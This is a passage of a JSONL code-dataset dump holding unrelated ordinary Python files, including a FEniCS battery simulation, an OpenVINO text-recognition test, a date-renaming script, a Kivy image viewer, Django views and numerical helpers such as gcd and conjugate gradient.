model\nprint(\"Predicting test data ... \")\nstart_time = time.time()\n\n# Predict test data and calculate accuracy score\nfrom sklearn.metrics import accuracy_score\nprediction = clf.predict(features)\naccuracy = accuracy_score(labels, prediction)\n\nprint(\"DONE (%.3fs)\" % (time.time() - start_time))\n\nprint(\"***\")\nprint(\"Test Accuracy: %.5f\" % accuracy)\nprint(\"RAM CONSUMED: %.3f megabytes\" % (psutil.Process(os.getpid()).memory_info().rss/1024/1024))\nprint(\"TOTAL EXECUTION TIME: %.3f seconds\" % (time.time() - execution_start_time))\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"579144087","text":"import sys\nfrom functools import partial\n\nimport dolfin as fem\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sympy as sym\n\nfrom buildup import common, utilities\nfrom mtnlion.newman import equations\n\n\n# NOTE: Deprecated\ndef picard_solver(a, lin, estimated, previous, bc, phis, phie):\n eps = 1.0\n eps_1 = 1.0\n tol = 1e-5\n iter = 0\n maxiter = 25\n while eps > tol and iter < maxiter:\n fem.solve(a == lin, estimated, bc)\n\n # calculate norm\n diff = estimated.vector().get_local() - previous.vector().get_local()\n eps = np.linalg.norm(diff, ord=np.Inf)\n\n print(\"iter={}, norm={}\".format(iter, eps))\n\n if iter > 1 and eps > eps_1:\n print(\"Solution diverging, reverting and stopping.\")\n estimated.assign(previous)\n break\n\n # update j\n phis.assign(estimated.split(True)[0])\n # phie.assign(estimated.split(True)[1])\n\n # set previous solution\n previous.assign(estimated)\n eps_1 = eps\n iter += 1\n\n\ndef main():\n # Times at which to run solver\n time_in = [0.1, 5, 9.9, 10, 10.1, 15, 20]\n\n dt = 0.1\n time = [None] * (len(time_in) * 2)\n time[::2] = [t - dt for t in time_in]\n time[1::2] = time_in\n\n I_1C = 20.5\n Iapp = [I_1C if 10 <= i <= 20 else -I_1C if 30 <= i <= 40 else 0 for i in time]\n\n # Collect common data\n cmn = common.Common(time)\n domain = cmn.domain\n comsol = cmn.comsol_solution\n Acell = cmn.fenics_consts.Acell\n\n x = sym.Symbol(\"ce\")\n y = sym.Symbol(\"x\")\n kp = cmn.fenics_consts.kappa_ref.subs(y, x)\n\n dfdc = sym.Symbol(\"dfdc\")\n # dfdc = 0\n kd = (\n fem.Constant(2)\n * cmn.fenics_consts.R\n * cmn.fenics_consts.Tref\n / cmn.fenics_consts.F\n * (fem.Constant(1) + dfdc)\n * (cmn.fenics_consts.t_plus - fem.Constant(1))\n )\n kappa_D = fem.Expression(sym.printing.ccode(kd), dfdc=0, degree=1)\n\n P = fem.FiniteElement(\"CG\", cmn.mesh.ufl_cell(), degree=1)\n element = fem.MixedElement([P, P, P, P])\n V = fem.FunctionSpace(cmn.mesh, element)\n V_ = [V.sub(i).collapse() for i in range(4)]\n\n v = fem.TestFunction(V)\n v_phis, v_phie, v_ce, v_cse = fem.split(v)\n u = fem.TrialFunction(V)\n u_phis, u_phie, u_ce, u_cse = fem.split(u)\n bc = [fem.DirichletBC(V.sub(0), 0.0, domain.boundary_markers, 1), 0, 0]\n\n # true solutions\n true = fem.Function(V)\n\n # fenics solutions\n estimated = fem.Function(V)\n\n phis_f = fem.Function(domain.V)\n phie_f = fem.Function(domain.V)\n ce_f = fem.Function(domain.V) # \"previous solution\"\n cse_f = fem.Function(domain.V)\n\n Uocp = equations.Uocp(cse_f, **cmn.fenics_params)\n j = equations.j(\n ce_f, cse_f, phie_f, phis_f, Uocp, **cmn.fenics_params, **cmn.fenics_consts, dm=domain.domain_markers\n )\n phis_form = partial(\n equations.phis, j, u_phis, v_phis, domain.dx((0, 2)), **cmn.fenics_params, **cmn.fenics_consts, ds=domain.ds(4)\n )\n phie_form = partial(equations.phie, j, ce_f, u_phie, v_phie, domain.dx, **cmn.fenics_params, **cmn.fenics_consts)\n\n # initialize matrix to save solution results\n phis_array = np.empty((len(time_in), len(comsol.mesh)))\n phie_array = np.empty((len(time_in), len(comsol.mesh)))\n j_array = np.empty((len(time_in), len(comsol.mesh)))\n\n dx = domain.dx\n assigner = fem.FunctionAssigner(V, [domain.V] * 4)\n assigner.assign(estimated, [phis_f, phie_f, ce_f, cse_f])\n\n k = 0\n for i in range(len(time_in)):\n i_1 = i * 2 # previous time step\n i = i * 2 + 1 # current time step\n cse_f.vector()[:] = comsol.data.cse[i][fem.dof_to_vertex_map(V_[0])].astype(\"double\")\n ce_f.vector()[:] = comsol.data.ce[i][fem.dof_to_vertex_map(V_[1])].astype(\"double\")\n phie_f.vector()[:] = comsol.data.phie[i][fem.dof_to_vertex_map(V_[2])].astype(\"double\")\n phis_f.vector()[:] = comsol.data.phis[i_1][fem.dof_to_vertex_map(domain.V)].astype(\"double\")\n\n bc[1] = fem.DirichletBC(V.sub(0), comsol.data.phis[i][-1], domain.boundary_markers, 4)\n bc[2] = fem.DirichletBC(V.sub(1), comsol.data.phie[i, 0], domain.boundary_markers, 1)\n\n kappa_ref = fem.Expression(sym.printing.ccode(kp), ce=ce_f, degree=1)\n kappa_eff = kappa_ref * cmn.fenics_params.eps_e ** cmn.fenics_params.brug_kappa\n kappa_Deff = kappa_D * kappa_ref * cmn.fenics_params.eps_e\n\n Feq = (\n phis_form(neumann=fem.Constant(Iapp[i]) / Acell)\n + phie_form(kappa_eff=kappa_eff, kappa_Deff=kappa_Deff)\n + fem.inner(u_ce, v_ce) * dx\n + fem.inner(u_cse, v_cse) * dx\n + fem.inner(u_phis, v_phis) * dx(1)\n )\n\n a = fem.lhs(Feq)\n lin = fem.rhs(Feq)\n\n picard_solver(a, lin, estimated, true, bc, phis_f, phie_f)\n\n phis_array[k, :] = estimated.split(True)[0].vector().get_local()[fem.vertex_to_dof_map(V_[0])]\n phie_array[k, :] = estimated.split(True)[1].vector().get_local()[fem.vertex_to_dof_map(V_[0])]\n j_array[k, :] = fem.interpolate(j, V_[0]).vector().get_local()[fem.vertex_to_dof_map(V_[0])]\n k += 1\n\n # x, ce, cse, phie, phis, csmax, ce0, alpha, k_norm_ref, F, R, Tref, Uocp_neg, Uocp_pos\n d = dict()\n d[\"x\"] = comsol.mesh\n d[\"ce\"] = comsol.data.ce[1::2]\n d[\"cse\"] = comsol.data.cse[1::2]\n d[\"phie\"] = comsol.data.phie[1::2]\n d[\"phis\"] = phis_array\n\n neg_params = {k: v[0] if isinstance(v, np.ndarray) else v for k, v in cmn.params.items()}\n d = dict(d, **neg_params)\n\n def filter(x, sel=\"neg\"):\n if sel is \"neg\":\n ind0 = 0\n ind1 = cmn.comsol_solution.neg_ind\n else:\n ind0 = 2\n ind1 = cmn.comsol_solution.pos_ind\n\n if isinstance(x, list):\n return x[ind0]\n\n if isinstance(x, np.ndarray):\n if len(x.shape) > 1:\n return x[:, ind1]\n\n return x[ind1]\n\n return x\n\n neg = dict(map(lambda x: (x[0], filter(x[1], \"neg\")), d.items()))\n dta = equations.eval_j(**neg, **cmn.consts)\n\n utilities.report(\n comsol.neg, time_in, phis_array[:, comsol.neg_ind], comsol.data.phis[:, comsol.neg_ind][1::2], \"$\\Phi_s^{neg}$\"\n )\n plt.show()\n utilities.report(\n comsol.pos, time_in, phis_array[:, comsol.pos_ind], comsol.data.phis[:, comsol.pos_ind][1::2], \"$\\Phi_s^{pos}$\"\n )\n plt.show()\n\n utilities.report(comsol.mesh, time_in, phie_array, comsol.data.phie[1::2], \"$\\Phi_e$\")\n plt.show()\n utilities.report(comsol.neg, time_in, dta, comsol.data.j[:, comsol.neg_ind][1::2], \"$j^{neg}$\")\n plt.show()\n utilities.report(\n comsol.pos, time_in, j_array[:, comsol.pos_ind], comsol.data.j[:, comsol.pos_ind][1::2], \"$j^{pos}$\"\n )\n plt.show()\n\n return 0\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"buildup/fenics_/phase2/coupled.py","file_name":"coupled.py","file_ext":"py","file_size_in_byte":6835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"110656995","text":"# #######################################################\r\n# create the systems in 3D,\r\n# create the wall systems\r\n#\r\n# author: giric goyal\r\n# #######################################################\r\n\r\n# -------------------------------------------------------\r\n# imports \r\nfrom util import *\r\nfrom math import *\r\nfrom euclid import *\r\nfrom omega import *\r\nfrom cyclops import *\r\nfrom cameraManager import *\r\nfrom caveutil import *\r\n\r\n\r\n\r\n# -------------------------------------------------------\r\n# variables\r\n\r\ninfoWindowContainer = None\r\n\r\n# -------------------------------------------------------\r\n# method definitions\r\ndef createVisualization():\r\n\ttheSystem = dict()\r\n\t\r\n\tfor system in systemList:\r\n\t\t# set the system name\r\n\t\t# create the objects\r\n\t\ttheSystem = allSystemsOrbital[system]\r\n\t\tpos = starLocations[system].pos * orbitScaleFactor * userScaleFactor * 0.000000001\r\n\t\tfor name, model in theSystem.iteritems():\r\n\t\t\tif theSystem[name].isStar == 1:\r\n\t\t\t\tdot = StaticObject.create(\"defaultSphere\")\r\n\t\t\t\tdot.setPosition(pos)\r\n\t\t\t\tdot.setScale(Vector3(10.0/70, 10.0/70, 10.0/70))\r\n\t\t\t\t\r\n\t\t\t\tif name == \"The Sun\":\r\n\t\t\t\t\tdot.setEffect(\"colored -e red\")\r\n\t\t\t\telse:\r\n\t\t\t\t\tif findInList(system, getDisplayList()) == True:\r\n\t\t\t\t\t\tdot.setEffect(\"colored -e #EEEE00CC\")\r\n\t\t\t\t\t\t#dot.setEffect(\"textured -v emissive -d \" + theSystem[name].texture)\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\t#dot.setEffect(\"textured -v emissive -d \" + theSystem[name].texture)\r\n\t\t\t\t\t\tdot.setEffect(\"colored -e white\")\r\n\t\t\t\tvizContainer.addChild(dot)\r\n\t\t\t\r\n\t\t\t\tvisualizeDict[system] = dot\r\n\t\t\t\t\r\n\t\t\t\tt1 = Text3D.create('fonts/verdana.ttf', 1, str(name))\r\n\t\t\t\tt1.setPosition(Vector3(pos.x, pos.y, pos.z))\r\n\t\t\t\tt1.yaw(pi)\r\n\t\t\t\tt1.setFontResolution(256)\r\n\t\t\t\tt1.setFontSize(fontSize)\r\n\t\t\t\tt1.getMaterial().setTransparent(False)\r\n\t\t\t\tt1.getMaterial().setDepthTestEnabled(False)\r\n\t\t\t\tt1.setColor(colorWhite)\r\n\t\t\t\torientObjects.append(t1)\r\n\t\t\t\tvizContainer.addChild(t1)\r\n\t\t\t\tvisualizeTextDict[system] = t1\r\n\t\r\n\t\r\n\tvizContainer.setPosition(vizPos * overallScaleFactor)\r\n\t\r\n\t\r\n\t\r\ndef changeColor():\r\n\tactiveSystem = getActiveSystem()\r\n\tfor system, model in visualizeDict.iteritems():\r\n\t\t#visualizeDict[system].setEffect(\"colored -e white\")\r\n\t\tif system == activeSystem:\r\n\t\t\tvisualizeDict[system].setEffect(\"colored -e red\")\r\n\t\telse:\r\n\t\t\tif findInList(system, getDisplayList()) == True:\r\n\t\t\t\tvisualizeDict[system].setEffect(\"colored -e #EEEE00FF\")\r\n\t\t\t\t#visualizeDict[system].setEffect(\"textured -v emissive -d \" + visualizeDict[system].texture)\r\n\t\t\t\tpass\r\n\t\t\telse:\r\n\t\t\t\tvisualizeDict[system].setEffect(\"colored -e white\")\r\n\t\t\t\t#visualizeDict[system].setEffect(\"textured -v emissive -d \" + visualizeDict[system].texture)\r\n\t\t\t\tpass\r\n\t\t\r\n\t\t\r\n\r\n\t","sub_path":"Project2/src/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"33839738","text":"#!/usr/bin/env python3\n\n# this program searches the current working directory (and subdirectories) for all filenames with American style dates and renames them to filenames with\n# European style dates\n\n# To test this, generate a bunch of files using the ch9_project_rename_File_Generator.py script\n\nimport os, re, sys, shutil\n\n\nRegExAmerican = re.compile(r\"\"\" \n (\\d{2}) #Month\n -\n (\\d{2}) #Day\n -\n (\\d{4}) #Year\n \"\"\", re.VERBOSE)\n\nif not len(sys.argv) == 2: \n print('Usage: python3.5 ch9_project_rename_dates.py \\nPlease retry with only one argument.')\n sys.exit()\n\nos.chdir(sys.argv[1])\n# for i in range(len(sys.argv)): #debug\n# print(sys.argv[i])\n\n\n# pull the list of files from the directory by either os.listdir() or an os.walk()\n\nfor folder, subdirs, files in os.walk(os.getcwd()):\n for f in files:\n # print(f) #debug\n #@@ do the regex match here\n if RegExAmerican.search(f): #require at least 1 match\n # print('if RegExAmerican.search(f) statement evaluated True') #debug\n mo = RegExAmerican.sub(r'\\2-\\1-\\3', f)\n # print(mo) #debug\n shutil.move(os.path.join(folder, f), os.path.join(folder, mo)) #Renames the file","sub_path":"2017_Summer/ch9_project_rename_dates.py","file_name":"ch9_project_rename_dates.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"177661176","text":"import cv2\nimport numpy as np\nfrom openvino.inference_engine import IECore,IENetwork\nimport matplotlib.pyplot as plt\n\nmodel_xml='open_model_zoo-master/tools/downloader/intel/text-recognition-0012/FP32/text-recognition-0012.xml'\nmodel_bin='open_model_zoo-master/tools/downloader/intel/text-recognition-0012/FP32/text-recognition-0012.bin'\nie = IECore()\n\nnet = ie.read_network(model=model_xml, weights=model_bin)\nex_net = ie.load_network(net,\"CPU\")\n\nimg = cv2.imread(\"text_recognition/0000_0.jpg\",cv2.IMREAD_GRAYSCALE)\n\ndataptr = net.input_info[\"Placeholder\"].input_data\n\nn, c, h, w = dataptr.shape\n\nalpha = 0.8 # コントラスト項目\nbeta = 20 # 明るさ項目\n\n# 明るさ・コントラスト操作\nres_img = cv2.convertScaleAbs(img, alpha=alpha, beta=beta)\n\nin_frame = cv2.resize(res_img, (w, h))\ninput_frame = in_frame.reshape((n, c, h, w))\n\nplt.imshow(in_frame.squeeze())\nplt.show()\n\nout = ex_net.infer({\"Placeholder\":input_frame})\nrecog = list(out.values()).pop().squeeze()\nrecog = np.argmax(recog,axis=1)\nprint(recog)\n\nchars = \"0123456789abcdefghijklmnopqrstuvwxyz#\"\nls = []\nfor i in chars:\n ls.append(i)\nchars = np.array(ls)\n\nstring = \"\"\nfor i in chars[recog]:\n if i!=\"#\":\n string += i\nprint(string)\n","sub_path":"text_recgnition_test.py","file_name":"text_recgnition_test.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"252146623","text":"from menu_parsing import menu_extract\nfrom page_parsing import process_page\nimport logging\nimport pandas as pd\n\nlink = \"https://tiki.vn/\"\nall_data = []\nall_category = menu_extract(link)\n\nfor link in all_category:\n for i in range(1,5,1):\n print(logging.error(\"processing page: %s\", i))\n data_df = (process_page(link, str(i)))\n category_link = link.split('/')[3]\n for data in data_df:\n all_data.append(tuple([data[0], data[1], data[2], data[3], data[4], data[5], data[6], data[7], data[8], data[9\n ]]))\n \n df = pd.DataFrame(all_data)\n df.to_csv(\"C:\\\\Users\\\\longbv1\\\\Desktop\\\\Tiki_Scapper\\\\raw\\\\tiki-\"+category_link+\".csv\", header=False, encoding=\"utf-8-sig\", index=False)\n\n","sub_path":"parsing/main_build.py","file_name":"main_build.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"474128428","text":"#! /usr/bin/python2.7\n# -*- coding: utf-8 -*-\n#\n# imageviewer.py\n#\n# Макет для вывода изображений с сервера.\n#\n# Апрель, 2016\n# Луганск\n# Автор сценария: Иванов Юрий aka HeaTTheatR\n#\n# Email: gorodage@gmail.com\n#\n\nimport os\n\ntry:\n from kivy.uix.widget import Widget\n from kivy.uix.boxlayout import BoxLayout\n from kivy.uix.button import Button\n from kivy.uix.popup import Popup\n from kivy.uix.image import Image\n from kivy.clock import Clock\n from kivy.core.window import Window\n from kivy.properties import ObjectProperty, ListProperty, StringProperty\n\n from progressload import ProgressLoad\n try:\n from Libs.server.retrieveprogressload import retrieve_progress_load\n except ImportError:\n import sys\n\n sys.path.insert(\n 0, os.path.split(os.path.abspath(sys.argv[0]))[0].split(\"/uix\")[0])\n\n from server.retrieveprogressload import retrieve_progress_load\nexcept Exception as text_error:\n import traceback\n open(\"/home/zavulon/sdssd.txt\", \"w\").write(str(sys.path))\n raise text_error\n\n\n__version__ = \"0.0.1\"\n\n\ndef p(*args):\n pass\n\n\nclass SettingSpacer(Widget):\n pass\n\n\nclass ImageViewer(BoxLayout):\n dismiss_callback = ObjectProperty(p)\n answer_callback = ObjectProperty(p)\n title_align = StringProperty(\"left\")\n title = StringProperty(\"Image\")\n background_image = StringProperty(\"atlas://data/images/defaulttheme/\"\n \"modalview-background\")\n size_hint = ListProperty([1, 1])\n auto_dismiss = ObjectProperty(True)\n text_button_cancel_load = StringProperty(\"Cancel\")\n text_already_loaded = StringProperty(\"Already loaded - {} byte\")\n text_total_size = StringProperty(\"Total size - {} byte\")\n path_to_save_content = StringProperty(\".\")\n full_path_to_load_content = StringProperty(\"data/logo/kivy-icon-24.png\")\n\n def __init__(self, **kwargs):\n super(ImageViewer, self).__init__(**kwargs)\n self.orientation = \"vertical\"\n\n # Бокс для кнопок выбора \"Да-Нет-Отмена\".\n self.box_buttons_select = \\\n BoxLayout(orientation=\"horizontal\", size_hint_y=None, height=40)\n self.body = Popup(title=self.title, title_align=self.title_align,\n background=self.background_image,\n on_dismiss=self.dismiss_callback,\n auto_dismiss=self.auto_dismiss,\n size_hint=self.size_hint)\n self.flag = False\n\n def on_load(self):\n self.flag = True\n\n def create_button(self, name_button):\n \"\"\"\n :type name_button: str;\n\n \"\"\"\n\n button_select = Button(text=name_button, id=name_button)\n button_select.bind(on_press=self.answer_callback)\n self.box_buttons_select.add_widget(button_select)\n\n return True\n\n def show(self, text_button_ok=None, text_button_no=None,\n text_button_cancel=None, auto_dismiss=False,\n title=\"Progress Download:\",\n link=\"http://msg.dimonvideo.ru/sklad/files/1941157/96f_kivy-logo\"\n \"-black-256.png\"):\n \"\"\"\n :type text_button_ok: str;\n :type text_button_no: str;\n :type text_button_cancel: str;\n\n :param link: ссылка для загрузки изображения;\n :param auto_dismiss: автоматическое закрытие окна;\n :param title: подпись окна процесса загрузки;\n\n \"\"\"\n\n def download_cancel(*args):\n setattr(retrieve_progress_load, \"flag\", 0)\n progress_load.body.dismiss()\n\n if not os.path.exists(self.path_to_save_content):\n try:\n os.mkdir(self.path_to_save_content)\n except Exception as text_error:\n raise text_error\n\n self.text_button_ok = text_button_ok\n self.text_button_no = text_button_no\n self.text_button_cancel = text_button_cancel\n\n self.full_path_to_load_content = \\\n \"{}/{}\".format(self.path_to_save_content, os.path.split(link)[1])\n\n # Если файл уже существует, просто открываем его.\n if not os.path.exists(self.full_path_to_load_content):\n progress_load = \\\n ProgressLoad(retrieve_callback=retrieve_progress_load,\n events_callback=download_cancel, title=title,\n text_button_cancel=self.text_button_cancel_load,\n text_already_loaded=self.text_already_loaded,\n text_total_size=self.text_total_size)\n progress_load.show(link, self.full_path_to_load_content,\n self.on_load)\n else:\n self.flag = True\n\n Clock.schedule_interval(self.show_image, 1)\n\n def show_image(self, interval):\n \"\"\"Выводит на экран загруженное изображение.\"\"\"\n\n if not self.flag:\n return\n\n image = Image(source=self.full_path_to_load_content)\n button = None\n\n for name_button in [self.text_button_ok, self.text_button_no,\n self.text_button_cancel]:\n if name_button:\n button = self.create_button(name_button)\n if not button:\n self.create_button(\"Yes\")\n\n self.add_widget(image)\n self.add_widget(Widget(size_hint=(None, .03)))\n self.add_widget(SettingSpacer())\n self.add_widget(Widget(size_hint=(None, .03)))\n self.add_widget(self.box_buttons_select)\n\n self.body.content = self\n self.body.open()\n\n Clock.unschedule(self.show_image)\n\n\nif __name__ in (\"__main__\", \"__android__\"):\n from tests import imageviewer\n\n imageviewer.Test(ImageViewer=ImageViewer).run()\n","sub_path":"Libs/uix/imageviewer.py","file_name":"imageviewer.py","file_ext":"py","file_size_in_byte":6041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"578124958","text":"import logging\nimport random\n\nimport tornado.escape\nimport tornado.ioloop\nimport tornado.websocket\n\nlogger = logging.getLogger()\n\n\nclass Table(object):\n def __init__(self):\n self.pid = Table.gen_id()\n self.players = [None, None, None]\n self.state = 0 # 0 waiting 1 playing 2 end 3 closed\n self.pokers = []\n self.multiple = 1\n self.call_score = 0\n self.whoseTurn = 0\n self.last_shot_seat = 0;\n self.last_shot_poker = [];\n self.room = 100\n tornado.ioloop.IOLoop.current().add_callback(self.update)\n\n def calc_coin(self, winner):\n self.state = 2\n coins = []\n tax = 100\n for p in self.players:\n p.ready = False\n coin = self.room * p.rank * self.call_score * self.multiple\n if p.rank == winner.rank:\n coins.append(coin - tax)\n else:\n coins.append(-coin - tax)\n return coins\n\n def update(self):\n logger.info('table[%d] update', self.pid)\n\n def add(self, player):\n for i, p in enumerate(self.players):\n if not p:\n player.seat = i\n self.players[i] = player\n logger.info('Table[%d] add Player[%d]', self.pid, player.pid)\n return True\n logger.error('Player[%d] join a full Table[%d]', player.pid, self.pid)\n return False\n\n def remove(self, player):\n for i, p in enumerate(self.players):\n if p and p.pid == player.pid:\n self.players[i] = None\n else:\n logger.error('Player[%d] not in Table[%d]', player.pid, self.pid)\n\n if all(p == None for p in self.players):\n self.state = 3\n logger.error('Table[%d] close', self.pid)\n return True\n return False\n\n def size(self):\n return 3 - self.players.count(None)\n\n def deal_poker(self):\n if not all(p and p.ready for p in self.players):\n return\n\n self.state = 1\n self.pokers = [i for i in range(54)]\n random.shuffle(self.pokers)\n for i in range(51):\n self.players[i % 3].pokers.append(self.pokers.pop())\n\n self.whoseTurn = random.randint(0, 2)\n for p in self.players:\n p.dealPoker()\n\n counter = 0\n\n @classmethod\n def gen_id(cls):\n cls.counter += 1\n return cls.counter\n\n\nif __name__ == '__main__':\n t = Table()\n print(t.pid)\n t = Table()\n print(t.pid)\n t = Table()\n print(t.pid)\n t = Table()\n print(t.pid)\n","sub_path":"server/model/table.py","file_name":"table.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"190959122","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 12/3/2018 4:23 PM\n# @Author : ZackChao\n# @Site : \n# @File : 二分查找.py\n# @Software: PyCharm\n\n\n\n\n# 10、通过不断对半的方法查找区间[a,b]内的数值位置?\n# 分析: L=[a,b]里找t位置\n\ndef binarySearch(list,item):\n low,hight=0,len(L)-1 # 跟踪区间头和尾\n while low<=hight:\n mid=(low+hight)/2 # 中间位置\n guess=list[mid]\n if guess>item: # 大于中间的数\n hight=mid -1 # 调整区间尾部为中间位置\n elif guess \")\n os.chdir(features_folder)\n current_folder_path, current_folder_name = os.path.split(os.getcwd())\n print(color_text(\"Entered folder \" + current_folder_name, \"blue\"))\n for source_file in glob.glob(\"doc*.txt\"):\n file_basename = source_file[:source_file.index(\".txt\")]\n doc_number = file_basename[4:file_basename.index(\"_features\")]\n rename_name = \"s\" + source_number + \"d\" + doc_number\n if file_basename.endswith(\"features\"):\n os.rename(source_file, rename_name + \".txt\")\n elif file_basename.endswith(\"_add_1\"):\n os.rename(source_file, rename_name + \"_1.txt\")\n elif file_basename.endswith(\"_add_2\"):\n os.rename(source_file, rename_name + \"_2.txt\")\n os.chdir(\"../..\")\n current_folder_path, current_folder_name = os.path.split(os.getcwd())\n print(color_text(\"Exited to \" + current_folder_name, \"pink\"))\n print('---------------------------------------------------------------------\\n')\n# - entry point\nif __name__ == \"__main__\":\n sources_folder = \"classifiers/data_test\" # change main folder name here\n features_folder = \"features\"\n print(color_text(\"starting...\", \"green\"))\n sources_sub_folders = next(os.walk(sources_folder))[1]\n os.chdir(sources_folder)\n for folder_name in sources_sub_folders:\n rename_files_in_folder(folder_name, features_folder)\n print(color_text('...done', \"green\"))\n quit()\n","sub_path":"rename_classifiers.py","file_name":"rename_classifiers.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"139648575","text":"from django.shortcuts import render\nfrom django.views.generic import View\nfrom .forms import ContactForm\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom .models import Service, Manager\n# Create your views here.\n\n\nclass HomeView(View):\n template_name = \"index.html\"\n form_class = ContactForm\n\n def get(self, request):\n form = self.form_class(None)\n return render(request, self.template_name, {'form':form})\n def post(self, request):\n form = self.form_class(request.POST)\n if form.is_valid():\n Name = form.cleaned_data['Name']\n Email = form.cleaned_data['Email']\n Subject = form.cleaned_data['Subject']\n Message = form.cleaned_data['Message']\n contact = form.save()\n return HttpResponse('hello')\n return render(request, self.template_name, {'form':form})\n\n\ndef Index(request):\n if request.method == 'GET':\n form = ContactForm()\n else:\n form = ContactForm(request.POST)\n if form.is_valid():\n contact = form.save()\n Name = form.cleaned_data['Name']\n Email = form.cleaned_data['Email']\n Subject = form.cleaned_data['Subject']\n Message = form.cleaned_data['Message']\n contact.save()\n return HttpResponse('')\n data = {'call':Service.objects.all , 'man':Manager.objects.all() ,'form':form}\n return render(request , 'index.html' , data)\n\n\n","sub_path":"jicommit/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"79595587","text":"from numpy import *\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn import ensemble, linear_model\nfrom statsmodels.tsa.seasonal import seasonal_decompose\nimport itertools\n\n\n# Set params\nyear_start = 2019\nweek_start = 10\n\n# Read in data\nreal_df = pd.read_csv(f'Output/{year_start}_real.csv', header=0)\nproj_df = pd.read_csv(f'Output/{year_start}_projected.csv', header=0)\nall_hierarchies = list(sort(list(set(proj_df['hierarchy'].values))))\nmetric_list = list(set(proj_df['metric'].values))\n\n# Remove all data that was used in training the model (data before the year-week start).\nproj_df = proj_df[(52*proj_df['year']+proj_df['week_num']) >= (52*year_start+week_start)]\n\n# Iterate through each hierarchy, aggregate projections across all stores, and compare against\n# the aggregation of the observed data.\nmodel_evaluation = pd.DataFrame(columns=['year','hierarchy','metric','avg_weekly_value','avg_weekly_projected_value','projection_RMSE','avg_weekly_percent_err'])\ndf_row = 0 \nfor k in range(len(all_hierarchies)):\n\tcurrent_hierarchy = all_hierarchies[k]\n\tcurrent_real_df = real_df[real_df['hierarchy'] == current_hierarchy]\n\tcurrent_proj_df = proj_df[proj_df['hierarchy'] == current_hierarchy]\n\tcombined_df = pd.merge(current_real_df,current_proj_df, on=['year','week_num','store_id','metric']).groupby(['year','week_num','metric']).sum()[['value','projected_value']]\n\tcombined_df = combined_df.reset_index().sort_values(['metric','year','week_num'])\n\n\tfor i in range(len(metric_list)):\n\t\tmetric = metric_list[i]\n\t\tcombined_df_metric = combined_df[combined_df['metric']==metric]\n\t\tmetric_real = combined_df_metric['value'].mean()\n\t\tmetric_proj = combined_df_metric['projected_value'].mean()\n\t\tmetric_RMSE = sqrt(sum((combined_df_metric['projected_value'].values-combined_df_metric['value'].values)**2))\n\t\tmetric_prcnt_err = 100*median(abs((combined_df_metric['projected_value'].values-combined_df_metric['value'].values)/combined_df_metric['value'].values))\n\t\tmodel_evaluation.loc[df_row] = [year_start,current_hierarchy,metric,metric_real,metric_proj,metric_RMSE,metric_prcnt_err]\n\t\tdf_row += 1\n\n\nmodel_evaluation.to_csv(f'Output/{year_start}_projection_errors.csv', header=True, index=False)\n\n\n","sub_path":"evaluate_model_errors.py","file_name":"evaluate_model_errors.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"355304628","text":"##recursive\ndef rgcd(a,b):\n if b == 0:\n return abs(a)\n else:\n return gcd(abs(b), abs(a) % abs(b))\n\ndef rxgcd(a,b):\n if b == 0:\n return (abs(a),abs(a)//a,0)\n else:\n (g,u,v) = xgcd(b, a % b)\n return (g, v, u-(a//b)*v)\n\n##iterative\ndef gcd(a,b):\n while b != 0:\n a, b = b, a % b\n return a # when b = 0, gcd(a,b) = a\n\ndef xgcd(a,b):\n prevu, u = 1, 0\n prevv, v = 0, 1\n while b != 0:\n q = a//b\n u, prevu = prevu - q*u, u\n v, prevv = prevv - q*v, v\n a, b = b, a % b\n return (a, prevu, prevv)","sub_path":"misc/helper-functions.py","file_name":"helper-functions.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"464795608","text":"import numpy as np\n\n\ndef conjugate_gradient(A, b, x0=None, accuracy=1e-5, iterations=10000):\n \"\"\"\n Solve Ax = b with conjugate gradient method\n :param A: 2d array\n :param b: 1d array\n :param x0: 1d array, initial point\n :param accuracy: answer accuracy\n :param iterations: maximum number of iterations\n :return: 1d array of x, such that Ax = b\n \"\"\"\n n = len(b)\n if not x0:\n x0 = np.ones(n)\n r = b - np.dot(A, x0)\n z = r\n r2 = np.dot(r, r)\n for i in range(0, iterations):\n Az = np.dot(A, z)\n alpha = r2 / np.dot(Az, z)\n x0 += alpha * z\n r -= alpha * Az\n r2_new = np.dot(r, r)\n beta = r2_new / r2\n r2 = r2_new\n if r2_new < accuracy:\n break\n z = r + beta * z\n return 